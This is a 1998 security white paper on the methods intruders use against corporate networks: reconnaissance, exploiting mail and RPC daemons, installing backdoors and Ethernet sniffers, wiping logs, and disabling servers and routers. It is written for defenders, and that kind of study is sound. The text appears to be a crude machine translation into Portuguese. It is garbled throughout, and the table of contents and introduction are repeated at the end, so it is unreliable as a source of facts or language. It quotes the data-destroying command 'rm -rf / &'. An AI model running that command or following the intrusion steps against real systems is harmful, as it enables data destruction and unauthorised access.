Pelos consultores do Ltd De Soluções De Segurança De Rede.
Frontal-linha Time De Segurança De Informação (PUNHO), Dezembro 1998.
fist@ns2.co.uk http://www.ns2.co.uk
------------------------------------------------------------------------------- 0 Índices ------------------------------------------------------------------------------
1. Introdução 1.1 Somente que é vulnerável de qualquer modo?
1.2 Perfil de um típico ' cracker de sistema'
2 Rede 2.1 metodologias de Rede adotadas por muitas companhias 2.2 Compreendendo vulnerabilidades em tais sistemas em rede
3 O ataque si mesmo 3.1 Técnicas utilizadas para 'manto' a localização do attackers 3.2 probing de Rede e reunião de informação 3.3 Identificando confiada componentes de rede 3.4 Identificando componentes de rede vulneráveis 3.5 Aproveitando componentes de rede vulneráveis 3.6 Sobre ganho acessa para componentes de rede vulneráveis
4 Abusando rede acessa e privilégios 4.1 Descarregando informação sensível 4.2 Partindo outro confiado redes dos anfitriões 4.3 Instalando backdoors e arquivos do trojaned 4.4 Tomando Nota De redes
5 A melhora de segurança de rede total 5.1 Sugerida leitura 5.2 Sugerida ferramentas e programas
------------------------------------------------------------------------------- 1.0 Introdução ------------------------------------------------------------------------------
Este papel branco foi escrito ajudar dá administradores de sistemas e pessoal de operações de rede uma visão dentro a tática e metodologias adotadas por crackers de sistema típico quando targeting redes grandes.
Este documento está não um guia sobre como para seguro suas redes, embora isto deveria ajudar você identifica segurança arrisca em seu ambiente em rede e talvez ajuda aponta quaisquer acidentes que estão esperando acontecer.
Nós desejamos você desfruta leitura este papel, e esperançosamente aprende um pequeno sobre como crackers opera nesse meio tempo!
O Ltd De Soluções De Segurança De Rede. BATA pessoal (fist@ns2.co.uk)
------------------------------------------------------------------------------- 1.1 Somente que é vulnerável de qualquer modo?
-------------------------------------------------------------------------------
Ambientes de computador Em Rede são utilizados todo dia por corporações e vários organisations. Redes de computadores permitem usuários para compartilhar quantias vastas de dados muitos eficientemente.
Usualmente redes associadas não são projetadas e implementadas com segurança em mente, meramente funcionalidade e eficiência, embora isto é boa de um ponto de vista de negócios no curto-termo, problemas de segurança usualmente sobem mais tarde, que podem milhões de custo para resolver em ambientes mais grandes.
A Maioria Das redes particulares sensíveis e associadas trabalham em um cliente-servidor princípio, onde empregados usam workstations para conectar para servidores para que compartilham informação. Neste papel nós concentraremos em segurança de servidor, como a maioria do crackers vai sempre primeiro de servidores de alvo, o servidor é muito gostado de um 'centro' onde todo a informação é armazenada. Se um cracker pode ganhar unauthorised acessa para tal um servidor, o descanso dele trabalho é fácil.
Festas Vulneráveis para grande-escala probes de rede usualmente inclue :
Instituições Financeiras e bancos Governo De companhias do Pharmaceutical De provedores de serviço Internet e Contratantes De agências de defesa para várias agências do goverment corporações Multinacionais
Embora muitos destes ataques tomam lugar internamente (por usuários que têm authorised acessa separar das redes sensíveis ou associadas já), nós estaremos concentrando nas técnicas utilizadas quando invadindo tais redes inteiramente do exterior.
Instituições Financeiras e bancos são probed e atacado em tentativas para comprometer fraude. Muitos bancos têm sido targeted desta forma, arriscando fundos monetários vastos. Bancos fazem isto política não para permitir ser as vítimas de tais ataques externos porque eles certamente perderão clientes e confiam se ataques são publically sabido.
Provedores de serviço Internet são um alvo comum por crackers, como servidores do ISP estão facilmente acessíveis da internet, e do ISP tem acessado para fibra grande conexões óticas que podem estar utilizadas por crackers para mover quantias grandes de dados através a internet. O ISP mais grande também tem bancos de dados de cliente, que usualmente contêm informação do usuário confidencial tal como números de cartão de crédito, especifica e endereços.
Companhias do Pharmaceutical são vítimas de principalmente tentativas de espionagem industriais, onde um time de vontade do crackers seja pagada quantias grandes em troca para roubada dados do pharmaceutical, tais companhias de droga freqüentemente gastam milhões em pesquisa e desenvolvimento, e um muito pode ser perdido como um resultado de tal um ataque.
Acima Do durado 6 anos, Governo e agências de defesa nos Estados Unidos têm sido vítima para literalmente milhões de ataques originando da internet. Devido à segurança de informação baixa orça e as políticas de segurança fracas de tais agências, segurança de informação tem tornada-se uma batalha do uphill, como governo e servidores militares estão constantemente sendo probed e atacado por crackers.
Contratantes de Defesa, embora segurança ciente, são alvos ao crackers procurando classificado ou dados militares sensíveis. Tais dados podem então são 'vendidos em' por crackers para grupos estrangeiros. Embora unicamente um punhado destes casos têm sido publically sabido, tais atividades podem ocorrer em uma valor alarmante.
Corporações Multinacionais são exemplos do prime de vítimas de tentativas de espionagem industriais. Corporações Multinacionais têm escritórios baseados completo o mundo, e redes associadas grandes são instaladas em pedido aos empregados para ser capazes de compartilhar informação eficientemente. Pessoal do NSS tem desempenhado penetration testa para corporações multinacionais, e nossas descobertas em a maioria dos casos têm mostrados que muitos podido seja comprometido.
Companhias do pharmaceutical Iguais, corporações multinacionais operando em eletrônica, software ou computador-relacionadas indústrias, gastam milhões em pesquisa e desenvolvimento de novas tecnologias. Isto é muito tentadodo para um competidor de tal uma corporação, para empregar um time de ' crackers de sistema' para roubar dados de uma corporação de alvo. Tais dados podem então estão utilizados para rapidamente e facilmente melhoram o conhecimento de competidores de tecnologias chaves, e resultam em perdas financeiras da corporação de alvo.
Outro forma de ataque adotado por competidores de corporações, está para 'toma nota de' uma rede associada para uma quantia certa de tempo, este resultados em perda de salário à corporação de alvo. Em a maioria dos casos isto está extremamente difícil para localizar a fonte de tal um ataque. Contando Com o segmentation de rede interno em lugar, esta espécie de ataque pode estar enormemente efetivo e resulta em perdas financeiras maciças.
Tal ' jogo sujo' é lugar comum em sociedade em rede de hoje, e deveria seria tomar muita seriamente.
------------------------------------------------------------------------------- 1.2 Perfil de um típico ' cracker de sistema' ------------------------------------------------------------------------------
Estudos têm mostrados aqueles típicos uns ' cracker de sistema' está usualmente masculino, envelhecido entre 16 e 25. Tal crackers usualmente torna-se interessado em invadir máquinas e redes para que melhoram suas habilidades partidas, ou para usar recursos de rede para seus próprios propósitos. A Maioria Do crackers estão completamente persistente em seus ataques, isto é devido à quantia de tempo livre um cracker médio tem.
Uma alta porcentagem de crackers são oportunistas, e correm scanners para checar números maciços de anfitriões para vulnerabilidades de sistema remotas. Sobre identificar os anfitriões ou redes que são vulneráveis para ataques remotos, o cracker usualmente ganhará raiz acessa ao anfitrião, então instala um backdoor e remenda o anfitrião de vulnerabilidades remotas comuns, isto previne outro crackers de existência capaz para usar as mesmas técnicas populares para ganhar acesso ao anfitrião.
Oportunistas operam em primeiramente dois domínios, a primeira existência a internet, as segundas redes de telefone de existência.
Para examinar os anfitriões internet para vulnerabilidades remotas comuns, o cracker usualmente lançará uma operação examinada de um anfitrião que ele tem acessado para com uma conexão rápida à internet, usualmente em uma fibra-ótica conexão.
Para examinar para máquinas operando em redes de telefone, sendo servidores terminais, boletim hospeda sistemas, ou voz envia sistemas. O cracker usará um programa do wardialling, esta vontade automaticamente examina quantias grandes de números de telefone para 'carregadores', assim identificando tais sistemas.
Uma muita pequena porcentagem de crackers realmente define alvos e tentam atacar eles, tal crackers estão longe mais hábis, e adotam 'incisivos-margem' técnicas para comprometer redes. Isto é conhecido para esses tipos de crackers para atacar redes associadas que são firewalled da internet por explorar não-publicadas vulnerabilidades e 'recursos' no firewalls.
As redes e hospeda targeted por esses crackers usualmente tem dados sensíveis contidos dentro eles, tal como pesquisam e notas de desenvolvimento, ou outros dados que provarão útis ao cracker.
Tal crackers são também conhecido de tem acessado explorar e ferramentas utilizadas por consultores de segurança e companhias de segurança grandes, e então uso eles para examinar definido alvos para todo sabido vulnerabilidades remotas. Crackers que estão atacando anfitriões específicos estão também usualmente muito paciente, e tem sido conhecido gastar muitos meses juntando dados antes tentar ganhar acesso para um anfitrião ou rede.
------------------------------------------------------------------------------- 2.1 metodologias de Rede adotadas por muitas companhias ------------------------------------------------------------------------------
Uma vontade de corporação típica tem uma presença internet aos seguintes propósitos :
O hospedado de E-mail Do webservers associado e outras comunicações globais via. a internet Para dar os empregados acesso internet
Do NSS DE corporações tem desempenhado penetration de rede testa da internet para, um ambiente em rede é adotado onde a rede associada e a internet são seperated por firewalls e proxies de aplicação.
Em tais ambientes, o webservers associado e mailservers são usualmente guardados nos 'exterior' da rede associada, e então informação é passada via. confiado canais sobre a rede associada.
No caso de confiança apresenta entre o mailservers externo e hospeda na rede associada, uma bema-pensamento filtro política tem colocar dentro efeito, como usualmente o mailservers externo deveria unicamente ser capaz de conectar para porta 25 de um solteiro 'seguro' mailserver na rede associada, como esta vontade maciçamente minimise a probabilidade de acesso do unauthorised, mesmo que o mailserver externo é comprometido.
Um Dos NSS DE redes associado tem desempenhado penetration testa em também teve um punhado de 'dual-homed' anfitriões, esses anfitriões tiveram interfaces de rede ativas em ambas a internet e a rede associada. De um ponto de vista de segurança, tais anfitriões que operam em redes múltiplas podem posar uma ameaça maciça para segurança de rede, como sobre comprometer um anfitrião, isto então substitui um simples 'ponte' entre redes.
------------------------------------------------------------------------------- 2.2 Compreendendo vulnerabilidades em tais sistemas em rede ------------------------------------------------------------------------------
Na internet, uma corporação pode tem 5 webservers externo, 2 mailservers externo, e um firewall ou filtro sistema implementado.
Webservers estão usualmente não atacado por crackers desejando ganhar acesso à rede associada, a menos que o firewall é misconfigured em algum caminho que permitirá o cracker acessa à rede associada sobre comprometer o webserver. Embora isto está sempre bom practise para seguro seu webservers e corre TCP wrappers para festas para conectar ao telnet e portas de ftp.
Mailservers estão comumente targeted por crackers desejando ganhar acesso à rede associada, como um mailserver deve tem acessar ao mailservers na rede associada para que distribue e troca correspondência entre a internet e a rede associada. Outra Vez, contando com o filtro em lugar, este tactic pode ou efetivo em parte do cracker.
Filtro routers estão também comumente targeted por crackers com agressive-snmp scanners e fio de comunidade bruto-força programas, se tal um ataque é efetivo, o router pode facilmente ser virado uma ponte, assim permitindo unauthorised acessa à rede associada.
Nesta espécie de situação o cracker avaliará exatamente que anfitriões externos ele tem acessado para, e então tentativa para identificar quaisquer espécies de confiança entre a rede associada e os anfitriões externos. Portanto se você instala TCP wrappers em todo seus anfitriões externos, que definem que unicamente festas confiadas podem conectar às portas do critical de seus anfitriões, que estão usualmente :
ftp (21), ssh (22), telnet (23), smtp (25), especificado (53), pop3 (110), imap (143), rsh (514), rlogin (513), lpd (515).
SMTP, especificado e portmapper deveria seria filtro portanto contar com papel do anfitrião está na rede.
Tal filtro tem sido proven para maciçamente reduzimos o risco de um ataque na rede associada.
Nos casos de redes com não limpam 'associadas à internet' política de segurança de rede, múltiplos-homed anfitriões e misconfigured routers existirá.
Uma falta de segmentation de rede interno vai também usualmente existe, isto faz isto um muito mais fácil para um cracker baseado na internet para ganhar o unauthorised acessa à rede associada.
mapping de rede Associado pode facilmente ocorrer se servidores do DNS externos são misconfigured, como NSS tem desempenhado penetration testa onde nós temos sido capazes de para mapa a rede associada via. tal um servidor do misconfigured DNS, por causa deste, isto é muito importante que DNS não existe entre os anfitriões na rede associada e anfitriões externos, isto está longe mais seguro para simplesmente usa IP endereça conectar para máquinas externas da rede associada e vice-versa.
Anfitriões Inseguros com interfaces de rede ativas em redes múltiplas podem ser abusadas ganhar acesso à rede associada muita facilmente.
O anfitrião inseguro faz não até mesmo tem comprometer. Isto é muito fácil para abusar um daemon de dedo em tal um anfitrião que permite transmitindo.. como usuários, hospeda e outra informação de rede pode ser colecionada identificar facilmente exploitable hospeda na rede associada, o sistema operacional de um anfitrião pode até mesmo ser determinado em muitos casos por emitir um dedo solicita para root@host, bin@host e daemon@host.
Algum crackers estão agora começando adotar técnicas com respeito às 'wardialling' de localizações associadas, tal como construindo e centros de operação de rede.
Se um cracker foi encontrar e então compromisso um servidor terminal associado, ele poderia usualmente ter um grau de acesso à rede associada, assim totalmente desviando qualquer firewalls ou filtro aquele seperate a rede associada da internet. Isto está portanto muito importante para identificar e assegura a segurança de seus servidores terminais, registrando de conexões para tais servidores está também fortemente aconselhado.
Quando tentando compreender vulnerabilidades em sistemas em rede, um ponto chave para recordar, está confiando entre os anfitriões em sua rede. Um Ou Outro através do uso de TCP wrappers, hosts.equiv arquivos, .rhosts ou . arquivos do shosts, muitas redes mais grandes são comumente atacadas por explorar a confiança entre os anfitriões.
Por Exemplo, se um attacker usa um CGI explora ver seu hosts.allow arquivo, ele pode achado que você todas conexões para seu ftp e portas do telnet de *.trusted.com. Certamente, o attacker pode então ganho acessa para qualquer anfitrião em trusted.com, e ganha acesso para seus anfitriões facilmente.
Para essas razões, isto está sempre uma boa idéia para assegurar que confiada anfitriões estão igualmente seguros de ataque remoto.
Um outro ataque que deveria seria mencionar, é a instalação de troianos e backdoors nos anfitriões associados (tal como Windows 95/98 máquinas), se os empregados têm acesso internet através de usar um proxy de aplicação e um firewall, então eles vão às vezes visita 'warez' sites para descarregar software do pirated.
Tal 'warez' sites usualmente têm software do screesaver, e outros utilitários em oferecem, que em alguns casos contêm programas do cavalo de troiano, tal como o Culto da Vaca Morta ' troiano de Orifícios Posteriores. Sobre a instalação do screensaver, o troiano infesta si mesmo dentro registro da máquina e está correndo todo tempo as botas de máquina.
No caso do troiano do BO, plugins pode ser aplicado ao troiano para fazer a máquina desempenha operações certas automaticamente, tal como conectam para servidores do IRC e unem canais, e o gostado de. Isto pode provar muito perigoso, como uma máquina do trojaned em sua rede associada podia facilmente ser controlada por alguéma na internet.
O troiano do BO está infinitamente mais efetivo se o cracker já tem acessado à rede associada, um ou outro porque ele é um empregado ou tem unauthorised acessa aos anfitriões associados. O troiano do BO podia ser instalado em todo Windows único 95/98 máquina em uma matéria de semanas se o cracker usa a estratégia correta, depois que ele terá controle remoto total acima das máquinas em pergunta, incluindo existência capaz para manipular arquivos, máquinas do reboot e formato par dirige, inteiramente remotamente.
------------------------------------------------------------------------------- 3.1 Técnicas utilizadas para 'manto' a localização do attackers ------------------------------------------------------------------------------
crackers Típico usualmente usará as seguintes técnicas para esconder seu endereço do IP verdadeiro :
- Bouncing através de previamente anfitriões comprometidos via. telnet ou rsh.
- Bouncing através do windows hospeda via. Wingates.
- Bouncing através dos anfitriões usando misconfigured proxies.
Se tal um cracker tem um modelo de sempre examinando seus anfitriões de previamente máquinas comprometidas, wingates ou proxies, então isto é aconselhável para contactar o administrador da máquina por telefone, e notifica ele dos problemas em mão. Nunca e-mail um administrador em tal um caso, porque o cracker pode simplesmente interceptar o e-mail de antemão.
O mais talented crackers que são hábil em invadir os anfitriões via.
trocas de telefone, podem uso as seguintes técnicas :
- Bouncing através de '800-number' telefone particular troca antes conectar para um ISP usando um 'cracked, 'phished' ou ' conta do carded.
- Conectando para um anfitrião por telefone, que está em volta conectada à internet.
Crackers adotando as técnicas de bouncing através de redes de telefone antes conectar à internet estão extremamente duras para seguir a pista abaixo, porque eles podiam estar literalmente em qualquer parte no mundo. Se um cracker foi usar um '800-number' dialup, ele podia discar dentro máquinas globalmente sem ter preocupar sobre o custo.
------------------------------------------------------------------------------- 3.2 probing de Rede e reunião de informação ------------------------------------------------------------------------------
Antes valor fora para atacar uma rede associada da internet, um cracker típico desempenhará algum probes preliminar de suas redes anfitriões externos apresentam na internet. Um cracker tentará ganhar externo e hostnames interno por usar as seguintes técnicas :
- Usando nslookup para desempenhar 'ls' solicitações.
- Vê o HTML em seu webservers para identificar quaisquer outros anfitriões.
- Vê os documentos em seus servidores de FTP.
- Conecta para seu mailservers e desempenha 'expn' solicitações.
- Manuseia usuários em seus anfitriões externos.
Crackers usualmente tenta juntar informação sobre o layout de sua rede si mesmo primeiro como oposto identificar vulnerabilidades específicas.
Por olhar resultados das perguntas listadas acima, isto está usualmente fácil para um cracker para construir uma lista de anfitriões e começam compreender os relacionamentos que existem entre eles.
Quando desempenhando esses probes preliminar, um cracker típico fará muitos pequenos erros e às vezes usam seu possuem IP para conectar para portas de suas máquinas para checar versões de sistema operacional e outros pequenos detalhes.
Se seus anfitriões são comprometidos, isto é uma boa idéia para checar seu FTP e HTTPD registra à presença de quaisquer solicitações estranhas.
------------------------------------------------------------------------------- 3.3 Identificando confiado componentes de rede ------------------------------------------------------------------------------
Crackers espera confiado componentes de rede para atacar, um componente de rede confiado está usualmente uma máquina de administradores, ou um servidor que é considerado como seguro.
Um cracker empreenderá por checar o NFS exporta de qualquer de suas máquinas nfsd que corre ou mountd, o caso sendo aqueles diretórios do critical em alguns de seus anfitriões (tal como /usr/bin, /etc e /casa por exemplo) pode ser mountable por tal um anfitrião confiado.
O daemon de dedo é freqüentemente abusado identificar confiado anfitriões e usuários, sendo usuários que freqüentemente registram dentro a máquina dos anfitriões específicos.
O cracker vai então checa suas máquinas para outros formulários de confiança, se ele pode explorar uma máquina usando uma vulnerabilidade do CGI, ele pode ganho acessa para uns anfitriões /etc/hosts.allow arquivo, por exemplo.
Depois analysing os dados dos acima checa, o cracker começará identificar confiança entre os anfitriões. O próximo passo ao cracker está identificar quaisquer anfitriões confiados que são vulneráveis para um compromisso remoto.
------------------------------------------------------------------------------- 3.4 Identificando componentes de rede vulneráveis ------------------------------------------------------------------------------
Se um cracker pode construir listas de seu externo e anfitriões internos, ele usará Linux programa tal como ADMhack, mscan, nmap e muitos scanners menores para examinar para vulnerabilidades remotas específicas.
Usuaully tais examinados de sua vontade dos anfitriões externa seja lançada de máquinas em conexões fibra-óticas rápidas, ADMhack requer correr como raiz em uma máquina do Linux, assim um cracker provavelmente usará uma máquina do Linux que ele tem ganho unauthorised acessa para e propriamente instalado um 'rootkit' em. Tal um 'rootkit' é utilizado para binários de sistema do backdoor critical para permitir o unauthorised e undetectable acessa ao anfitrião.
Os administradores de sistemas dos anfitriões que são utilizados para examinar os anfitriões associados externos usualmente têm nenhuma idéia que examina estão sendo lançados de suas máquinas, como binários tal como 'ps' e ' donetstat são trojaned para esconder examinando processos.
Outros programas tal como mscan e nmap não requer correr como raiz, e assim pode ser lançada do Linux (ou outras plataformas no caso de nmap) hospeda para efetivamente identifica vulnerabilidades remotas, embora esses examina são mais lentas, e podem não usualmente estão bemas muitas ocultas (como o attacker não necessita raiz acessa ao anfitrião como com o ADMhack).
Ambos ADMhack e mscan desempenha os seguintes tipos de checa nos anfitriões remotos :
- Um TCP portscan de um anfitrião.
- Um dump dos serviços do RPC correm via. portmapper.
- Uma listagem de exportações apresentam via. nfsd.
- Uma listagem de ações apresentam via. samba ou netbios.
- dedo Múltiplo solicita identificar contas de default.
- vulnerabilidade do CGI examinando.
- Identificação de versões vulneráveis de daemons de servidor, incluindo Sendmail, IMAP, POP3, condição do RPC e RPC mountd.
Programa tal como SATANÁS estão raramente utilizado por crackers hoje em dia, como eles são lentos.. e examina para vulnerabilidades obsoletas.
Depois ADMhack que corre ou mscan nos anfitriões externos, a vontade do cracker tem uma boa idéia de anfitriões seguros ou vulneráveis.
Se routers estão apresentando que são SNMP capaz, o mais crackers avançado adotará agressive-snmp examinando técnicas para tentar e ' força de bruto' os fios de comunidade particulares e públicos de tais dispositivos.
------------------------------------------------------------------------------- 3.5 Aproveitando componentes de rede vulneráveis ------------------------------------------------------------------------------
Assim o cracker tem identificado quaisquer anfitriões externos confiados, e também identificados quaisquer vulnerabilidades nos anfitriões externos. Se quaisquer componentes de rede vulneráveis foram identificados, então ele tentará comprometer seus anfitriões.
Um cracker paciente não comprometerá seus anfitriões durante horas normais, ele usualmente lançará um ataque entre 9pm na noite e 6am a próxima manhã, esta vontade reduzimos o likelyhood de qualquer um sabendo sobre o ataque, e dá o cracker tempo amplo para instalar o backdoors e sniffers em seus anfitriões sem ter preocupar sobre a presença de Administradores De Sistemas.
A Maioria Do crackers tem um grande acordo de tempo livre acima de fins-de-semana, e ataques são usualmente lançados então.
O cracker comprometerá um externo confiado anfitrião que pode estar utilizado como um ponto de que para lançar um ataque na rede associada. Contando Com o filtro entre a rede associada e os anfitriões associados externos, esta técnica pode ou.
Se o cracker compromete um mailserver externo, que na verdade tem acesso total para um segmento da rede associada interna, então ele pode começar trabalho em embutir ele mesmo fundamente dentro sua rede.
Para comprometer a maioria dos componentes em rede, crackers usará programas para remotamente exploram versões vulneráveis de daemons de servidor continua anfitriões externos, tais exemplos incluem versões vulneráveis de Sendmail, IMAP, POP3 e serviços do RPC tal como statd, mountd e pcnfsd.
A Maioria Das façanhas remotas utilizadas por crackers são lançadas de previamente anfitriões comprometidos, como em alguns casos eles necessitam compilar na mesma plataforma como o anfitrião eles estão estar utilizados para explorar.
Sobre executar tal um programa remotamente para explorar um daemon de servidor vulnerável continua seu anfitrião externo, o cracker usualmente ganhará raiz acessa para seu anfitrião, que na verdade pode ser abusado ganhar acesso para outros anfitriões e a rede associada.
------------------------------------------------------------------------------- 3.6 Sobre ganho acessa para componentes de rede vulneráveis ------------------------------------------------------------------------------
Depois explorando um daemon de servidor, o cracker começará um 'limpo-para cima' operação de falsificação seus anfitriões registra e ' binários de serviço do backdooring assim ele pode acessar o undetected do anfitrião mais tarde.
Primeiro ele começará implementar o backdoors, assim ele pode mais tarde acessar o anfitrião. A Maioria Do backdoors que uso do crackers são precompiled, e técnicas são adotadas mudar a data e as permissões do binário que tem sido backdoored, em alguns casos, até mesmo o filesize do novo binário é o mesmo como o binário original. Attackers ciente de FTP transfere registros podem uso o 'rcp' programa copiar o backdoored programa hospedar.
Isto é improvável que tal um cracker invadindo uma rede associada começará remendar seus anfitriões de vulnerabilidades, ele vai usualmente unicamente instala backdoors e binários de sistema do critical de troiano tal como 'ps' e 'netstat para esconder quaisquer conexões ele pode faz para e do anfitrião.
Os seguintes binários do critical estão usualmente backdoored no Solaris 2.x máquinas:
/usr/bin/login /usr/sbin/ping /usr/sbin/in.telnetd /usr/sbin/in.rshd /usr/sbin/in.rlogind
Algum crackers tem também sido conhecido colocar um .rhosts arquiva no /usr/bin diretório para permitir depósito remoto acessa ao anfitrião via. rsh e csh em modo interativo.
A próxima coisa que a maioria do crackers está checar o anfitrião para qualquer presença de registrar sistemas que podem têm registrados suas conexões ao anfitrião, ele vai então continua editar tais conexões fora de quaisquer registros encontrados no anfitrião. Isto é aconselhável para registrar para um lineprinter se a máquina é muita provavelmente para ser um alvo do prime de um ataque, como isto faz isto extremamente difícil ao cracker para editar ele mesmo dos registros.
Sobre assegurar que sua presença não tem sido registrada em qualquer caminho, o cracker continuará invadir a rede associada. A Maioria Do crackers vai não mais ambas vulnerabilidades exploradas em outros anfitriões externos se eles têm acessado à rede interna.
------------------------------------------------------------------------------- 4.1 Descarregando informação sensível ------------------------------------------------------------------------------
Se meta do cracker está descarregar informação sensível de servidores de FTP ou webservers na rede associada interna, ele pode fazer assim do anfitrião externo que está agindo como um 'ponte' entre a internet e rede associada.
Entretanto, se meta do cracker está descarregar informação sensível segurada dentro internamente anfitriões em rede, ele continuará tentar ganhar acesso para eles por abusar a confiança com o anfitrião externo ele já tem acessado para.
------------------------------------------------------------------------------- 4.2 Partindo outro confiado anfitriões e redes ------------------------------------------------------------------------------
A Maioria Do crackers simplesmente repetirá os passos aceitados seções 3.2, 3.3, 3.4 e 3.5 ao probe e ganha acesso para hospedar na rede associada interna, contando com que o cracker está tentando alcançar, troianos e backdoors pode ou em seus anfitriões internos.
Se o cracker deseja alcançar rede total acessa aos anfitriões na rede interna, ele instalará troianos e backdoors e remove registros como em seção 3.6. Crackers também instalará sniffers em seus anfitriões, esses são explicados em seção 4.3.
Se o cracker meramente deseja descarregar dados de servidores chaves, ele tomará aproximações diferentes para ganhar acesso para seus anfitriões, tal como identificando e atacando anfitriões chaves que são confiados pelo alvo servidores chaves.
------------------------------------------------------------------------------- 4.3 Instalando sniffers ------------------------------------------------------------------------------
Um extremamente caminho efetivo ao crackers para rapidamente obtem quantias grandes de usernames e senhas para internamente anfitriões em rede está usar 'ethernet sniffer' programas. Porque tal 'sniffer' programa necessidade para operar no mesmo ethernet como os anfitriões o cracker deseja ganhar acesso para, isto poderia estar ineficaz para correr um sniffer no anfitrião externo ele está usando como uma ponte.
Para '(funga' dados fluindo através a rede interna, o cracker deve desempenhar uma raiz remota compromete de um anfitrião interno que está no mesmo ethernet como um número de outros anfitriões internos. As técnicas mencionadas em seções 3.2, 3.3, 3.4, 3.5 e 3.6 são adotadas aqui, como o cracker deve comprometer e backdoor o anfitrião bem sucedidamente para assegurar que o programa do sniffer pode ser instalado e utilizado efetivamente.
Sobre comprometer, instalando um backdoor e instalando trojaned 'ps' e ' programas do netstat, o cracker deve então instala o 'ethernet sniffer' programa no anfitrião. Tais programas do sniffer são usualmente instalados nos /usr/bin ou / diretórios do dev sob o Solaris 2.x, e então modificado parecer como se eles foram instalado com todo os outros binários de sistema.
Maior 'ethernet sniffers' visita a fundo e saída para um registro na máquina local, isto é importante para recordar que o cracker vai usualmente backdoor o ' binário do ps, assim o processo notável.
Tal 'ethernet sniffers' trabalha por retorno uma interface de rede dentro ' modos do promiscuous, a interface então escuta e registra ao sniffer logfile, qualquer usernames útil, senhas ou outros dados que podem estar utilizados pelo cracker para ganhar acesso para outros anfitriões em rede.
Porque 'ethernet sniffers' são instalado no ethernets, literalmente quaisquer dados viajando através aquela rede pode ser (fungada, isto não tem viajar para ou do anfitrião em que o sniffer é instalado.
O cracker usualmente voltará uma semana mais tarde e descarrega o logfile criado pelo 'sniffer' programa. No caso de uma rede associada rompe tal como esta, isto está provavelmente que a vontade do sniffer seja montada muita bema, e dificilmente detectable a menos que uma boa política de segurança é implementada.
Um muito bom utilitário utilizado por muitos segurança-cientes Administradores é Tripwire, que é disponível de COSTA (vê seção 5.2). Tripwire faz um MD5 'impressão digital' de seu filesystem, e detectará quaisquer modificações para seus arquivos feitos por usuários do malicious ou crackers.
Para detectar interfaces de rede do promiscuous (um sinal comum de uma instalação do sniffer), a 'cpm' ferramenta disponível do CERT é muito útil, vê http://www.cert.org/ftp/tools/cpm/ para mais informação.
------------------------------------------------------------------------------- 4.4 Tomando Nota De redes ------------------------------------------------------------------------------
Se um cracker pode comprometer servidores chaves aplicações de servidor que corre tal como bancos de dados, sistemas de operações de rede ou qualquer outro ' critical de missão' funções, isto é fácil para ele para tomar nota de sua rede para um período de tempo.
Um cru, mas não técnica rara adotada por crackers tentando desabilitar funções de rede, poderiam ser apagar todo os arquivos dos servidores chaves por emitir uns 'rm -rf / &' comanda no servidor. Contando Com o sistema de cópia de segurança implementado, o sistema podia ser para algo de horas, para meses.
Se um cracker foi ganhar acesso para sua rede interna, ele podia abusar vulnerabilidades apresentam em muitos routers tal como no Cisco, Baía e Ascende marcas. Em alguns casos o cracker podia reiniciar, ou fecha routers inteiramente até um administrador foi ao reboot eles.
Isto pode causar problemas grandes com respeito a funcionalidade de rede, como se o cracker foi montar uma lista de routers vulnerável que desempenhado papeis de rede chaves (se eles estiveram utilizados no backbone associado por exemplo), então ele podia facilmente desabilitar a capacidade de rede de corporações para algum tempo.
Para essas razões, isto é muito importante que ' critical de missão' routers e servidores são sempre remendados e seguros.
------------------------------------------------------------------------------- 5.1 Sugerido leitura ------------------------------------------------------------------------------
Há muitos bons papeis disponíveis para ajudar você mantem segurança de seu externo e anfitriões internos e routers, nós recomendamos você visita o seguinte websites e olha nos seguintes livros se você deseja aprender mais sobre securing redes grandes e anfitriões :
http://www.antionline.com/archives/documents/advanced/ http://www.rootshell.com/beta/documentation.html http://seclab.cs.ucdavis.edu/papers.html
http://rhino9.ml.org/textware/
' Unix Prático & Segurança Internet' ------------------------------------
Uma boa introdução dentro Unix e segurança Internet se você realmente não tem lido muito dentro o assunto antes.
Simson Garfinkel e Spafford O'Reilly De Gene & Associa, Inc.
ISBN 1-56592-148-8
NÓS $39.95 POSSO $56.95 (UK cerca 30 libras)
------------------------------------------------------------------------------- 5.2 Sugerido ferramentas e programas ------------------------------------------------------------------------------
Há muitas boa segurança grátis programa disponível para plataformas comuns tal como Solaris, IRIX, Linux, AIX, HP-UX e Windows Nt, nós recomendamos você olha no seguinte websites para informação em tais ferramentas de segurança grátis :
ftp://coast.cs.purdue.edu/pub/tools/unix/ http://www.alw.nih.gov/Security/prog-full.html http://rhino9.ml.org/software/
Ltd De Soluções De Segurança De Rede., está também correntemente desenvolvendo um plethora de ferramentas de segurança para Unix e Windows baseado plataformas, essas vontade está disponível acima dos próximos meses poucos, sentem liberam visitar nosso site no http://www.ns2.co.uk , também tem cuidado grátis 'lite' versões de nosso software!
-------------------------------------------------------------------------------
Copyright (c) Ltd De Soluções De Segurança De Rede. 1998 Todos Os Direitos Reservados, todas marcas registradas reconhecidas
http://www.ns2.co.uk
Este documento pode ser distribuido no domínio público enquanto o acima notas de copyright permanecem intactas.
-------------------------------------------------------------------------------
Frontal-linha Time De Segurança De Informação (PUNHO), Dezembro 1998.
fist@ns2.co.uk http://www.ns2.co.uk
------------------------------------------------------------------------------- 0 Índices ------------------------------------------------------------------------------
1. Introdução 1.1 Somente que é vulnerável de qualquer modo?
1.2 Perfil de um típico ' cracker de sistema'
2 Rede 2.1 metodologias de Rede adotadas por muitas companhias 2.2 Compreendendo vulnerabilidades em tais sistemas em rede
3 O ataque si mesmo 3.1 Técnicas utilizadas para 'manto' a localização do attackers 3.2 probing de Rede e reunião de informação 3.3 Identificando confiada componentes de rede 3.4 Identificando componentes de rede vulneráveis 3.5 Aproveitando componentes de rede vulneráveis 3.6 Sobre ganho acessa para componentes de rede vulneráveis
4 Abusando rede acessa e privilégios 4.1 Descarregando informação sensível 4.2 Partindo outro confiado redes dos anfitriões 4.3 Instalando backdoors e arquivos do trojaned 4.4 Tomando Nota De redes
5 A melhora de segurança de rede total 5.1 Sugerida leitura 5.2 Sugerida ferramentas e programas
------------------------------------------------------------------------------- 1.0 Introdução ------------------------------------------------------------------------------
Este papel branco foi escrito ajudar dá administradores de sistemas e pessoal de operações de rede uma visão dentro a tática e metodologias adotadas por crackers de sistema típico quando targeting redes grandes.
Este documento está não um guia sobre como para seguro suas redes, embora isto deveria ajudar você identifica segurança arrisca em seu ambiente em rede e talvez ajuda aponta quaisquer acidentes que estão esperando acontecer.
Nós desejamos você desfruta leitura este papel, e esperançosamente aprende um pequeno sobre como crackers opera nesse meio tempo!
